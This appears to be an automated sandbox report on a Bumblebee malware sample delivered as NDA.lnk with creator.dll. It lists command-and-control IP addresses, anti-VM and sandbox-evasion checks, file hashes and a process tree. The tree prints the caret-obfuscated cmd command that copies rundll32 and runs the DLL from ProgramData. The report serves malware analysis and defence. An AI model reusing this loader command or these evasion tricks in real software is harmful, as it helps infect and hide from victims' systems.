Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241023-en -
submitted
29-11-2024 13:02
Static task
static1
Behavioral task
behavioral1
Sample
NDA.lnk
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
NDA.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
creator.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
creator.dll
Resource
win10v2004-20241007-en
Malware Config
Extracted
bumblebee
0310
146.59.117.200:443
192.255.188.11:443
149.3.170.62:443
Signatures
-
Bumblebee family
-
Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo rundll32.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ rundll32.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions rundll32.exe -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rundll32.exe -
Executes dropped EXE 1 IoCs
pid Process 2940 rundll32.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Wine rundll32.exe -
Loads dropped DLL 5 IoCs
pid Process 2820 cmd.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2940 rundll32.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2908 timeout.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe 2940 rundll32.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2604 wrote to memory of 2820 2604 cmd.exe 31 PID 2604 wrote to memory of 2820 2604 cmd.exe 31 PID 2604 wrote to memory of 2820 2604 cmd.exe 31 PID 2820 wrote to memory of 2884 2820 cmd.exe 32 PID 2820 wrote to memory of 2884 2820 cmd.exe 32 PID 2820 wrote to memory of 2884 2820 cmd.exe 32 PID 2820 wrote to memory of 2888 2820 cmd.exe 33 PID 2820 wrote to memory of 2888 2820 cmd.exe 33 PID 2820 wrote to memory of 2888 2820 cmd.exe 33 PID 2820 wrote to memory of 2908 2820 cmd.exe 34 PID 2820 wrote to memory of 2908 2820 cmd.exe 34 PID 2820 wrote to memory of 2908 2820 cmd.exe 34 PID 2820 wrote to memory of 2940 2820 cmd.exe 35 PID 2820 wrote to memory of 2940 2820 cmd.exe 35 PID 2820 wrote to memory of 2940 2820 cmd.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\NDA.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b /min xco^py /y C:\Windows\System32\rund*.exe c:\programdata && start /b /min xco^py /h /y cr^eat^or.dll c:\programdata && cd c:\programdata && timeout 1 && start /b /min r^u^ndll32.exe creator.dll,runprog && exit2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\xcopy.exexcopy /y C:\Windows\System32\rund*.exe c:\programdata3⤵PID:2884
-
-
C:\Windows\system32\xcopy.exexcopy /h /y creator.dll c:\programdata3⤵PID:2888
-
-
C:\Windows\system32\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:2908
-
-
\??\c:\ProgramData\rundll32.exerundll32.exe creator.dll,runprog3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
PID:2940
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD5f7e264d654ad023794222f1e2fa866e6
SHA10f5a405879ce713986b4940a51158bd2ee99e750
SHA256177a9689065b14408eb7af71432ec9a621d56fba5182cd74f3690e989a95d023
SHA51282bd12740934ff7608419770fd205f0ddd57bd418ecee827834866414cda9265e9600ad7931097942838df4dddcc751c0e31b1e5736c4e3f52e054c5e7bf2f6b
-
Filesize
44KB
MD5dd81d91ff3b0763c392422865c9ac12e
SHA1963b55acc8c566876364716d5aafa353995812a8
SHA256f5691b8f200e3196e6808e932630e862f8f26f31cd949981373f23c9d87db8b9
SHA5128a5036ccab9c9e71deb4ecb9598528ca19c2d697a836846d23e1547b24172fa236a798092c7db676929abff830e40f52ce8f3b3bdd8d4c2553d7c021fceaf120